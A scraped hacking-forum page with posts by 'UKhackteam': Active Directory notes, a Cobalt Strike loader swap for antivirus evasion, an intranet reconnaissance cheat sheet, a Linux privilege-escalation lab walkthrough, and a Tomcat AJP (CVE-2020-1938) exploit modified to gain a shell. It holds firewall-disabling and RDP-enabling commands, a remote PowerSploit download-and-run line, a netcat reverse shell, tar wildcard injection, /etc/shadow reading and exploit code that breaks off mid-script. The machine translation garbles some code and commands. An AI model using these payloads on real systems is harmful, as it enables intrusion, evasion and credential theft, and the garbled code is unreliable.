enterprise Whether the object types in OU are mixed depends on management needs The main function of OU is to control the scope of Group Policy deployment and the delegation of management permissions in the active directory. 对象类型1:用户 域用户的登录 Domain username@domain name (such as [email protected]) Domain name\Domain username (such as abc\tester) 查看 SID 1 get-aduser -Identify [username] 用户单个用户的创建和管理方式 AD Users and Computers AD Management Center 批量用户的创建和管理方式 The server built-in command line tools (such as csvde and ldifde) Writing Powershell scripts 对象类型2:组 组的用途 Set user's permissions or rights in batches 组的分类 Press whether to be built-in: built-in group, custom group By scope of action: local group, global group, general group 对象类型3:计算机 计算机被动加域 The computer account was not created in the active directory in advance. After adding the domain, the computer account will be automatically saved in the default Computers container. 计算机主动加域 The administrator has created a computer account in the specified OU in advance in the active directory. After adding the domain, the computer account in the specified OU will be created according to the corresponding computer name association. 计算机账户密码/安全通道 The Secure Channel (Secure Channel) for communication between the domain-joined computer and the domain controller is required to establish a password. It is generated locally by the client computer and uploaded to the active directory of the domain controller to save. By default, the password will be automatically changed every 30 days. If the client computer fails to communicate with the domain controller for more than 30 days, the domain controller allows the secure channel to be maintained using the last expired computer account password saved in the active directory, but the time cannot exceed two password update cycles at most (the default maximum is 60 days). Otherwise, the secure channel will be destroyed and the client will automatically de-domain, causing the user to be unable to log in. Parameters such as the update cycle and validity of computer passwords can be adjusted through Group Policy 对象的查找和筛选 AD 用户和计算机 AD 管理中心 PS 脚本 AD 管理的权利委派 Operation delegation to AD can be configured at the OU level to allocate common management tasks for objects in the OU to designated users or groups to reduce the workload of domain administrators (such as modifying the attributes of department accounts, unlocking account numbers, resetting account passwords, etc.) RSAT 工具 RAT (Remote Server Administration Tool) can be used to cooperate with AD rights delegation to perform remote operations of AD domain services on the client operating system (such as resetting passwords, unblocking passwords, etc.) 组策略的配置 组策略概述 The essence of group policy is to modify the computer's registry in a more friendly way. Each setting in the group policy can correspond to the key value in the registry to achieve operational control of the operating system and application Group Policy includes local group policy and domain group policy Local Group Policy : gpedit.msc Domain Group Policy: Use the Group Policy Tool to configure and issue on the domain controller Domain group policy helps regulate unified management of terminals within the domain and reduce workload of people 组策略的常见用途 Account Security/Authment Policy Power on/off script Folder redirection Deploy printer/shared folder mapping Client desktop environment settings Setting parameters of Microsoft applications such as IE Automatic software installation and deployment Restrict the software to run Firewall security settings 组策略的分类 维度一:按配置生效的阶段 Computer configuration User Configuration 维度二:安配置是否可以被更改 Strategy Preferences 维度三:按配置内容领域 Windows Settings Administrative templates 组策略的配置 The system contains two default GPOs by default Default Domain Policy Domain level affects all computers and users in the domain Default Domain Controller Policy Container Level, affecting all domain controllers Other GPOs need to create configurations and links by themselves 部署的注意事项 GPO needs to be configured on the domain controller and will be synchronized to other domain controls through AD replication mechanism After the GPO creates an edit, the group policy can only be effective if it links to the domain or OU. A GPO can be associated with multiple OUs, and a single OU can also contain multiple different GPOs. Deleting a GPO link does not mean deleting a GPO, but deleting a GPO will automatically delete the associated GPO link. If you want to make a GPO not effective, you can disable a link to the GPO, or you can not enable the GPO as a whole. You do not necessarily need to delete the GPO link or delete the GPO 组策略的应用范围 After creation, GPO cannot be directly applied to computers, users, or user groups, but must be linked to containers or OUs in the AD active directory, or directly applied to the entire domain level. GPO will be effective for all computers/users under the domain or OU by default. If you want to further precisely control the scope of your application, you can use Security Filtering or WMI Filtering. GPO can also set individual exclusion objects for the default application scope. 组策略的生效时间 Automatically obtain and take effect on the computer's "Computer Configuration" entry The user logs in automatically and takes effect on the "User Configuration" entry If the computer is turned on or the user is logged in, it will take 90-120 minutes to take effect by default (the random value of 90 minutes plus 30 minutes is added to avoid concurrent peaks, and this time can be matched) The client can force the group policy to be retrieved and refreshed through the command gpupdate/force Some settings need to restart the computer or log out of the user to log in again even after application. 客户端查看当前应用的 GPO: 1 2 gpresult /h d:\gporesult.html gpresult /r ##Type processing principles Inheritance principle Enable/disable inheritance The principle of accumulation Priority Principle Child OU Parent OU Domain Site Local Policy Sequence principle Multiple GPOs in the same OU are in order of up and down Other principles Only computers in OU will only apply "Computer Configuration" Only users in OU will only apply to "user configuration" If there are both computers and users in OU, both types of configurations are enabled (computer configuration is preferred when there is conflict) 组策略的其它操作 组策略的备份与恢复 You can back up a single GPO or all GPOs Timestamp is recorded for each backup, so accurate recovery can be done based on saving multiple historical versions. 组策略的存储 域的信任关系 信任关系的概念 Domain is a security boundary. If there is no trust relationship between domains, users in each domain can only access resources in this domain. Trust relationship builds a bridge (trust path) between two domains, allowing domain user accounts to be used across domains, realizing cross-domain authentication and resource access Commonly used scenarios for trust relationships include company mergers and acquisitions, external cooperation, activity directory migration, etc. Depending on the domain type, some trust relationships exist by default, while others need to be created manually 信任关系的方向性 Domain A One-way Trust Domain B Resources in Domain A can be accessed by Domain B Bidirectional trust in domain A and domain B Resources in Domain A can be accessed by Domain B Resources in domain B can be accessed by domain A 信任关系的传递性 If the trust relationship is transitive, multiple trust relationships that can be passed on can be automatically connected. If the trust relationship is not passed, the trust chain will be broken and the automatic connection of the trust relationship cannot be completed. 林内的信任关系 林间的信任关系 快捷信任
  11. UKhackteam

    Title: Replace the loader in cobaltstrike to avoid killing

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    通过替换 cobaltstrikes 中自带 loader 进行免杀 原因 For the artifact generated by cobaltstrike, our commonly used method is to generate shellcode, and then implement a loader to load shellcode by yourself. When I read the cobaltstrike code to generate artifact, I thought the method was very interesting. The author first wrote a loader, and then generated artifact by patching the generated shellcode into the loader. To kill soft and statically check this virus, the first thing is to find the feature points of shellcode and the feature points of artifact template. So if we write a loader ourselves to replace the loader that comes with cobaltstrike, we can achieve a kill-free effect. The focus of the article is not to over-kill the soft-soft, but only proof of concept. The technology used is to implement the loader yourself and then simply xor the shellcode to bypass the feature detection and killing of shellcode. 工具介绍 web dogs are always curious about binary. The way artifact is learned when reading cobaltstrike. This software is just for proof of concept. I copied a lot of source code of cs, mainly because I thought the form of patch is very interesting. The source code will be uploaded to github together when writing the second article. The jar package can be decompiled by itself without any confusion. I will try it yourself first, refer to the source code and write the loader by myself, replace resource/artifact.exe to let the artifact.exe generated by cobaltstrike be free of kill by default. Select script console Then enter : 1 x transform(shellcode('your Listener name','x86',false),'array') Open chaos: Copy into the text box and click generate: Select a folder to save Click to go online :
  12. UKhackteam

    Title: Intranet information collection

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    内网信息收集 收集本机信息 手动信息搜集 查询网络配置信息 1 ipconfig /all 查询操作系统及软件的信息 查询操作系统和版本信息 1 2 systeminfo | findstr /B /C:'OS Name' /C:'OS Version' systeminfo | findstr /B /C:'OS name' /C:'OS version' 查询系统体系结构 1 echo %PROCESSOR_ARCHITECTURE% 查看安装的软件、版本及路径等 1 wmic product get name, version 1 powershell 'Get-WmiObject -class Win32_Product | select-Object -Property name, version' 查询本机服务 1 wmic service list brief 查询进程列表 1 2 tasklist wmic process list brief 查看启动程序信息 1 wmic startup get command, caption 查看计划任务 1 schtasks /query /fo LIST /v 查看主机开机时间 1 net statistics workstation 查询用户列表 1 2 3 4 net user net localgroup administrators # Query online users: query user || qwinsta 列出或断开本地计算机与所连接的客户端之间的会话 1 net session 查询端口列表 1 netstat -ano 查看补丁列表 1 systeminfo 1 wmic qfe get Caption, Description, HotfixID, InstalledOn 查询本机共享列表 1 2 net share wmic share get name,path,status 查询路由表及所有可用接口的ARP缓存表 1 2 route print arp -a 查询防火墙相关配置 关闭防火墙 Windows 2003 version 1 netsh firewall set opmode disable Windows 2003 later version 1 netsh firewall set allprofiles state off 修改防火墙配置 Version before Windows 2003 1 netsh firewall add allowedprogram c:\nc.exe 'allow nc' enable Windows 2003 later version 1 netsh firewall add rule name='pass nc' dir=in action=allow program='C:\nc.exe' Allow the specified program to be connected 1 netsh advfirewall firewall add rule name='Allow nc' dir=out action=allow program='C:\nc.exe' Allow 3389 to release 1 netsh advfirewall firewall add rule name='Remote Desktop' protocol=TCP dir=in localport=3389 action=allow 自定义防火墙日志的存储位置 1 netsh advfirewall firewall set currentprofile logging filename 'C:\windows\temp\fw.log' 查看代理情况 1 reg query 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' 查询并开启远程连接服务 查看远程连接端口 1 reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' /V PortNumber 0xd3d converts to decimal to 3389 在Windows Server2003中开启3389端口 1 wmic path win32_terminalservicesetting where(__CLASS!='') call setallowtsconnections 1 在Windows Server2008和Windows Server2012中开启3389端口 1 2 3 4 5 6 wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS!='') call setallowsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName=’RDP-Tcp’) call setupuserauthenticationrequired 1 reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fSingleSessionPerUser /t REG_DWORD /d 0 /f 自动化收集信息 Empire下的主机信息搜集 查看本机用户、域成员、密码设置时间、剪切板内容、系统基本信息、网络适配器信息、共享信息 1 usemodule situational_awareness/host/winenum 1 situational_awareness/host/computerdetails 查询当前权限 查询当前权限 1 Whoami Three situations: Local regular users Local Admin User Domain users 获取域 SID 1 whoami /all 查询指定用户的详细信息 1 net user XXX /domain 判断是否存在域 使用 ipconfig 命令 1 ipconfig /all 查看系统详细信息 1 systeminfo 查询当前登录域及用户信息 1 net config workstation 判断主域 1 net time /domain After executing the command, there are three situations: Domain exists: not currently the domain user System error occurred Domain exists: and the current user is a domain user As shown in the picture above The current network environment is a working group Domain controller not found 探测内网存活主机 利用 NetBIOS 快速探测内网 1 nbtscan.exe 192.168.1.0/20 利用 ICMP 协议快速探测内网 1 for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr 'TTL=' 通过 ARP 扫描探测内网 arp-scan工具 1 arp.exe -t 192.168.1.0/20 Empire 中的 ARPscan 模块 1 usemodule situational_awareness/network/arpscan Nishang 中的 Invoke-ARPScan.ps1 脚本 1 powershell.exe -exec bypass -Command '{Import-Module C:\windows\temp\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.0/24}' C:\Windows\temp\log.txt 扫描内网端口 metasploit 端口扫描 1 auxiliary/scanner/portscan/tcp PowerSploit 的 Invoke-portscan.ps1 脚本 1 powershell.exe -nop -exec bypass -c 'IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/POwershellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\rex.txt' Nishang 的 Invoke-PortScan 模块 1 Invoke-Portscan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost 端口 banner 信息 收集域内基础信息 查询域 1 net view /domain 查询域内所有计算机 1 net view /domain:HACKE 查询域内所有用户列表 1 net group /domain 查询域内所有成员计算机列表 1 net group 'domain computers' /domain 查询域密码信息 1 net accounts /domain 获取域信任信息 1 nltest /domain_trusts 查找域控制器 查看域控制器的机器名 1 nltest /DCLIST:DomainName 查看域控制器的主机名 1 nslookup -type=SRV _ldap._tcp. 查看当前时间 1 net time /domain 查看域控制器组 1 net group 'Domain Controllers' /domain 1 netdom query pdc 获取域内的用户和管理员信息 查询所有域用户列表 向域控服务器进行查询 1 net user /domain 获取域内用户的详细信息 1 wmic useraccount get /all 查看存在的用户 1 dsquery user 查询本地管理员组用户 1 net localgroup administrators 查询域管理员用户 查询域管理员用户 1 net group 'domain admins' /domain 查询管理员用户 1 net group 'Enterprise Admins' /domain 定位域管理员 常用工具 pslogon.exe 1 pslogon.exe \\DC PVEFindADUser.exe 1 PVEFindADUser.exe -current netview.exe nmap的脚本 Collect information on domain control, and you can obtain host information, user and other information smb-enum-sessions.nse Obtain permissions to a certain host, but cannot obtain more domain user information Smb-enum-users.nse Iterate through the shared directory of the remote host smb-enum-shares.nse Traversal of the host remote process smb-enum-process.nse Information about the host's operating system, computer name, domain name, domain forest name, NetBIOS machine name, workgroup, system time, etc. smb-os-discovery powerview脚本 Invoke-StealthUserHunter Invoke-UserHunter Empire 的 user_hunter模块 1 usemode situational_awareness/network/powerview/user_hunter 查找域管进程 本机检查 获取域管理员列表 1 net group 'Domain Admins' /domain 列出本机的所有进程及进程用户 1 tasklist /v 查询域控的域用户会话 https://github.com/nullbind/Other-Projects/tree/master/GDA 查询远程系统中运行的任务 First, collect the domain administrator list from the Domain Admins group Then, add the target ip to ips.txt and add the collected domain administrator list to the names.txt file. 1 2 FOR /F %i in (ips.txt) DO @echo [+] %i @tasklist /V /S %i /U user /P password 2NUL output.txt FOR /F %n in (names.txt) DO @type output.txt | findstr %n NUL echo [!] %n was found running a process on %i pause 扫描远程系统的 NetBIOS 信息 First, collect the domain administrator list from the Domain Admins group Then, add the target ip to ips.txt and add the collected domain administrator list to the admins.txt` file. 1 for /F %i in (ips.txt) do @echo [+] Checking %i nbtstat -A %i 2NUL nbsessions.txt FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n NUL echo [!] %n was found logged into %i BloodHound 工具 1 brew services start neo4j 收集脚本 https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors 1 SharpHound.exe -c all
  13. UKhackteam

    Title: in.security Power-up range

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    in.security 提权靶场 lin.security Range is a range that led to the escalation of privileges caused by Linux configuration problems. It is based on Ubuntu (18.04 LTS) Linux virtual machine. Range provides many privilege escalation vulnerabilities for us to practice related knowledge about linux permissions. The following is the download link for this range: https://in.security/downloads/lin.security_v1.0.ova Low permissions for shooting range: bob:secret 查看当前用户的权限: whoami, id 查看系统的发行版本和内核版本: lsb_release -a, uname -a 1 linux 下的权限划分 1.1 用户和组 User groups play an important role on Linux systems, and they provide selected users with an easy way to share files with each other. They also enable system administrators to manage user permissions more efficiently because they can assign permissions to groups rather than individual users. Linux users are divided into administrators and ordinary users, and ordinary users are divided into system users and custom users. System administrator: that is, the root account, the UID number is 0, and has all system permissions. It is similar to the administrator account in Windows system and is the owner of the entire system. System user: Linux is an account built into its own system management. It is usually automatically created during the installation process and cannot be used to log in to the operating system. The UID is between 1-499 (Centos 7 is between 1-999). Users like sshd, pulse, etc. above are such users. It is similar to the system account in Windows, and of course the permissions are far less high than the system account. Custom user: The root administrator creates an account for users to log in to the system for operations. The UID is above 500 (CentOS7 is above 1000). It is similar to an account in the users user group on Windows systems. Each user in Linux must belong to a group, and cannot be independent of the group. In Linux, each file has the concept of owner, group, or other groups. Similarly, we can view the information of user groups in /etc/group 1.2 /etc/passwd 文件 In the /etc/passwd file of Linux, each user has a corresponding record line, which records some basic properties of this user. System administrators are often exposed to modification of this file to complete the management of users. Add an account to the linux system: useradd -g group -d /home/to/user -m username Field meaning: 1.3 /etc/shadow 文件 Field meaning: Username : Encrypted password (! means no password) : Last modified time : Minimum modification time interval : Password validity period : Password needs warning days before change : Grace time after password expires : Account expiration time : Reservation field 加密的密码具有固定格式:$id$salt$encrypted id represents the encryption algorithm, 1 represents MD5, 5 represents SHA-256, 6 represents SHA-512 salt is the salt value, and the system generates randomly encrypted represents the hash value of the password 1.4 文件权限 In the Linux system, everything is a file, including ordinary files, directories, devices, sockets, etc. rwx permissions to directory r: means that you have permission to read the directory structure list, and means that you can query the file name data in the directory. That is ls w: means that you can add, delete, rename, copy, cut files or directories under this folder, etc. x: indicates whether the user can enter the directory and become a working directory (when there is no x permission, but w permission, it is also impossible to write files to the file) 1.5 特殊权限 SUID When executing the file, it will switch to the owner's permission to execute SGID When this file is executed, it will switch to the permissions of all groups to execute SBIT Only you and the administrator can operate the current file 2 sudo 权限配置不当提权 sudo is actually a very common command. The sudo permission is root. The command that can only be executed by super users to execute to ordinary users. The command here refers to system commands. For Linux, everything is a file, so the system command is also a file. Generally speaking, when an administrator needs a user to execute the root permission command, he will configure sudo. Specifically, modify the /etc/sudoers file. However, ordinary users actually view and operate this file, and they can only check whether they have configured sudo permissions. Ordinary users can use the sudo -l command to check whether they have sudo configuration. bob user can execute many commands, and using these commands can simply and directly upgrade to root permissions. 2.1 /bin/ash 2.2 /usr/bin/awk View password file /etc/shadow 2.3 /usr/bin/curl 2.4 /usr/bin/find Get shell find . -exec /bin/sh \; -quit It can be found that even if the find search command is given sudo, it can be raised as root permissions, as long as we can cleverly use these commands to execute. Due to space limitations, we will not give any way to use all commands. We can refer to the resources https://gtfobins.github.io/, which covers many commands that can be exploited. 3 /etc/passwd的哈希 The user password hash of linux is stored in the /etc/shadow file, which ordinary users cannot view. What ordinary users can view is the /etc/passwd file. If we look at /etc/passwd, we usually see the following: 1 root:x:0:0:root:/root:/bin/bash If there is an account's second column is a password hash, if the column is x, it means the password hash is stored on the /etc/shadow file. On the lin.security virtual machine, you can see an account like insecurity, and the uid and gid of this account are 0. Using Johnny or hash-identifier will be represented as descrypt, which can then be cracked. Through query, you can get the password P@ssw0rd11. 4 利用定时任务cron以及通配符 Execute the /etc/cron.daily/backup file regularly every 1 minute. This involves using wildcards to perform local Linux privilege raising. We need to open another bob ssh session. Use msfvenom to generate nc rebound sentence, the command is as follows: -p:payload R: RAW raw data 1 2 3 4 5 6 root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=127.0.0.1 lport=8888 R [-] No platform was selected, choosing Msf:Module:Platform:Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 91 bytes mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0/tmp/kuhdq | /bin/sh /tmp/kuhdq 21; rm /tmp/kuhdq Then execute separately: 1 2 3 bob@linsecurity:~$ echo 'mkfifo /tmp/kuhdq; nc 127.0.0.1 8888 0/tmp/kuhdq | /bin/sh /tmp/kuhdq 21; rm /tmp/kuhdq' shell.sh chmod +x shell.sh bob@linsecurity:~$ echo '' '--checkpoint-action=exec=sh shell.sh' bob@linsecurity:~$ echo '' --checkpoint=1 We enable nc listening in another session terminal: 1 nc -lvnp 8888 –checkpoint[=NUMBER] Displays progress message for each Numbers record (default is 10) --checkpoint-action=ACTION Perform ACTION on each checkpoint (checkpoint) The --checkpoint-action option here specifies the program to be executed when a checkpoint reaches, which will allow us to run an arbitrary command. Therefore, the options --checkpoint=1 and --checkpoint-action=exec=sh shell.sh are handed over to the tar program as command line options. 5 利用隐藏文件 Sometimes hidden files will store some important information, such as searching for all hidden files in the home directory and displaying them with ls -al. 1 find/-name '.*' -type f -path '/home/*' -exec ls -al {} \; 2/dev/null I found that the user susan has a hidden file of .secret, and found that the user susan's login password is stored. 6 利用 SUID 6.1 方案一 SUID This is a combination of uid +s, s refers to special permissions. Generally speaking, the user's permissions are 3 digits, such as 0755. The default special permissions are not configured, but if the super administrator wants the user to have root permissions when executing some special permission files, they will configure special permissions. For example, the passwd command will modify the /etc/shadow file, while the /etc/shadow can only be modified by root. Originally, the passwd command should only be executed by root. However, in order to allow ordinary users to modify their passwords, the system gives special permissions to the passwd command and adds restrictions that can only modify their passwords. Since the passwd command has been restricted, there is no problem in granting special permissions, but if the special permissions of the system superuser are used indiscriminately, it will lead to the problem of raising the rights. So how do we find out whether there are special permission configuration files in the system? You can quickly find all SUID files using the following command: 1 find/-perm -4000 -type f -exec ls -la {} 2/dev/null \; We found the following file xxd. This file is actually a command file. The function of xxd is to display a file in hexadecimal form. He is configured with special permissions and the user group is itsservices with execution permissions x. This is very dangerous, and once suid and execution permissions are together, it may lead to permission elevation. We checked through the command and found that the user susan belongs to the user group itsservices. We use it to view the /etc/shadow file. For more usage methods, please refer to https://gtfobins.github.io/gtfobins/xxd/. 1 xxd '/etc/shadow' | xxd -r Note: find /dir -exec 'command' has the same effect of elevating power. 6.2 方案二 In addition to the above files, a file with the other role with execution permission was also found. This file is not limited to users, so it is even more harmful. Refer to https://gtfobins.github.io/gtfobins/taskset/#suid-enabled, and you can find that this file can directly obtain the shell. 7 NFS 提权 nmap Scan the port to view open services: nmap -sS -Pn -p- -A IP See open port 2049, NFS service. You can also use the rpinfo -p IP command to determine whether the NFS service is running or mounted on the host. Information collection can be performed when the showmount command is used with the following parameters, for example: Mounting point Connected host Table of contents 1 2 3 showmount IP //Connected host showmount -d IP //Directory showmount -a IP //Mount Point There is also a module in msf that can be used to list export folders: auxiliary/scanner/nfs/nfsmount. The home directory of the account peter can be mounted: 1 2 mkdir /mnt/peter mount 192.168.68.99:/home/peter /mnt/peter/ The mounted peter home directory, the owner and group of the displayed file are 1001 and 1005 respectively Try to create a file in this directory and find that the permissions are insufficient. Even though we are root users on the kali attack machine, we still do not have write permissions because by default the root identity of the client will be actively compressed into anonymous. You can fake the UID and GID of the file owner to trick the NFS server, create a user group with gid 1005, and then create a peter account with uid specified as 1001 and gid specified as 1005. Switch the client user to peter, and the server also considers it to be an existing user. You can write the public key directly to the .ssh folder and then log in directly using ssh. 8 利用 docker 组提权 It can be found that peter belongs to the docker group:
  14. UKhackteam

    Title: CVE-2020-1938 Apache Tomcat AJP file contains vulnerability recurrence

    UKhackteam posted a post in a topic in Hacker Cracking / Penetration Testing / Cybersecurity
    CVE-2020-1938 Apache Tomcat AJP 文件包含漏洞复现 漏洞复现 环境搭建 docker-compose.yml 1 2 3 4 5 6 7 version: '2' services: tomcat: image: vulhub/tomcat:9.0.30 ports: - '8080:8080' - '8009:8009' Start the mirror: 1 docker-compose up -d POC Source: https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC The original author's pc can only read files. Change the original author's pc self.req_uri=req_uri to self.req_uri=req_uri + '.jsp' to include the file, thereby bounce the shell. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 twenty one twenty two twenty three twenty four 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 #!/usr/bin/env python import struct # Some references: # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html def pack_string(s): If s is None: return struct.pack('h', -1) l=len(s) return struct.pack('H%dsb' % l, l, s.encode('utf8'), 0) def unpack(stream, fmt): size=struct.calcsize(fmt) buf=stream.read(size) return struct.unpack(fmt, buf) def unpack_string(stream): size,=unpack(stream, 'h') if size==-1: # null string return None res,=unpack(stream, '%ds' % size) stream.read(1) # \0 Return res class NotFoundException(Exception): pass class AjpBodyRequest(object): # server==web server, container==servlet SERVER_TO_CONTAINER, CONTAINER_TO_SERVER=range(2) MAX_REQUEST_LENGTH=8186 def __init__(self, data_stream, data_len, data_direction=None): self.data_stream=data_stream self.data_len=data_len self.data_direction=data_direction def serialize(self): data=self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) if len(data)==0: return struct.pack('bbH',0x12,0x34,0x00) else: res=struct.pack('H', len(data)) res +=data if self.data_direction==AjpBodyRequest.SERVER_TO_CONTAINER: header=struct.pack('bbH',0x12,0x34, len(res)) else: header=struct.pack('bbH',0x41,0x42, len(res)) return header + res def send_and_receive(self, socket, stream): while True: data=self.serialize() socket.send(data) r=AjpResponse.receive(stream) while r.prefix_code !=AjpResponse.GET_BODY_CHUNK and r.prefix_code !=AjpResponse.SEND_HEADERS: r=AjpResponse.receive(stream) if r.prefix_code==AjpResponse.SEND_HEADERS or len(data)==4: break class AjpForwardRequest(object): _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY=range(28) REQUEST_METHODS={'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} # server==web server, container==servlet SERVER_TO_CONTAINER, CONTAINER_TO_SERVER=range(2) COMMON_HEADERS=['SC_REQ_ACCEPT', 'SC_REQ_ACCEPT_CHARSET', 'SC_REQ_ACCEPT_ENCODING', 'SC_REQ_ACCEPT_LANGUAGE', 'SC_REQ_AUTHORIZATION', 'SC_REQ_CONNECTION', 'SC_REQ_CONTENT_TYPE', 'SC_REQ_CONTENT_LENGTH', 'SC_REQ_COOKIE', 'SC_REQ_COOKIE2', 'SC_REQ_HOST', 'SC_REQ_PRAGMA', 'SC_REQ_REFERER', 'SC_REQ_USER_AGENT' ] ATTRIBUTES=['context', 'servlet_path', 'remote_user', 'auth_type', 'query_string', 'route', 'ssl_cert', 'ssl_cipher', 'ssl_session', 'req_attribute', 'ssl_key_size', 'secret', 'stored_method'] def __init__(self, data_direction=None): self.prefix_code=0x02 self.method=None self.protocol=None self.req_uri=None self.remote_addr=None self.remote_host=None self.server_name=None self.server_port=None self.is_ssl=None self.num_headers=None self.request_headers=None self.attributes=None self.data_direction=data_direction def pack_headers(self): self.num_headers=len(self.request_headers) res='' res=struct.pack('h', self.num_headers) for h_name in self.request_headers: if h_name.startswith('SC_REQ'): code=AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 res +=struct.pack('BB',0xA0, code) else: res +=pack_string(h_name) res +=pack_string(self.request_headers[h_name]) Return res def pack_attributes(self): res=b'' for attr in self.attributes: a_name=attr['name'] code=AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 res +=struct.pack('b', code) if a_name=='req_attribute': aa_name, a_value=attr['value'] res +=pack_string(aa_name) res +=pack_string(a_value) else: res +=pack_string(attr['value']) res +=struct.pack('B',0xFF) Return res def serialize(self): res='' res=struct.pack('bb', self.prefix_code, self.method) res +=pack_string(self.protocol) res +=pack_string(self.req_uri) res +=pack_string(self.remote_addr) res +=pack_string(self.remote_host) res +=pack_string(self.server_name) res +=struct.pack('h', self.server_port) res +=struct.pack('?', self.is_ssl) res +=self.pack_headers() res +=self.pack_attributes() if self.data_direction==AjpForwardRequest.SERVER_TO_CONTAINER: header=struct.pack('bbh',0x12,0x34, len(res)) else: header=struct.pack('bbh',0x41,0x42, len(res)) return header + res def parse(self, raw_packet): stream=StringIO(raw_packet) self.magic1, self.magic2, data_len=unpack(stream, 'bbH') self.prefix_code, self.method=unpack(stream, 'bb') self.protocol=unpack_string(stream) self.req_uri=unpack_string(stream) self.remote_addr=unpack_string(stream) self.remote_host=unpack_string(stream) self.server_name=unpack_string(stream) self.server_port=unpack(stream, 'h') self.is_ssl=unpack(stream, '?') self.num_headers,=unpack(stream, 'H') self.request_headers={} for i in range(self.num_headers): code,=unpack(stream, 'H') if code0xA000: h_name=AjpForwardRequest.COMMON_HEADERS[code -0xA001] else: h_name=unpack(stream, '%ds' %code) stream.read(1) # \0 h_value=unpack_string(stream) self.request_headers[h_name]=h_value def send_and_receive(self, socket, stream, save_cookies=False): res=[] i=socket.sendall(self.serialize()) if self.method==AjpForwardRequest.POST: Return res r=AjpResponse.receive(stream) assert r.prefix_code==AjpResponse.SEND_HEADERS res.append(r) if save_cookies and 'Set-Cookie' in r.response_headers: self.headers['SC_REQ_COOKIE']=r.response_headers['Set-Cookie'] # read body chunks and end response packets while True: r=AjpResponse.receive(stream) res.append(r) if r.prefix_code==AjpResponse.END_RESPONSE: break elif r.prefix_code==AjpResponse.SEND_BODY_CHUNK: Continue continue else: raise NotImplementedError break Return res class AjpResponse(object): _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK=range(7) COMMON_SEND_HEADERS=[ 'Content-Type', 'Content-Language', 'Content-Length', 'Date', 'Last-Modified', 'Location', 'Set-Cookie', 'Set-Cookie2', 'Servlet-Engine', 'Status', 'WWW-Authenticate' ] def parse(self, stream): # read headers self.magic, self.data_length, self.prefix_code=unpack(stream, 'HHb') if self.prefix_code==AjpResponse.SEND_HEADERS: self.parse_send_headers(stream) elif self.prefix_code==AjpResponse.SEND_BODY_CHUNK: self.parse_send_body_chunk(stream) elif self.prefix_code==AjpResponse.END_RESPONSE: self.parse_end_response(stream) elif self.prefix_code==AjpResponse.GET_BODY_CHUNK: self.parse_get_body_chunk(stream) else: raise NotImplementedError def parse_send_headers(self, stream): self.http_status_code,=unpack(stream, 'H') self.http_status_msg=unpack_string(stream) self.num_headers,=unpack(stream, 'H') self.response_headers={} for i in range(self.num_headers): code,=unpack(stream, 'H') if code=0xA000: # custom header h_name,=unpack(stream, '%ds' %code) stream.read(1) # \0 h_value=unpack_string(stream) else: h_name=AjpResponse.COMMON_SEND_HEADERS[code-0xA001] h_value=unpack_string(stream) self.response_headers[h_name]=h_value def parse_send_body_chunk(self, stream): self.data_length,=unpack(stream, 'H') self.data=stream.read(self.data_length+1) def parse_end_response(self, stream): self.reuse,=unpack(stream, 'b') def parse_get_body_chunk(self, 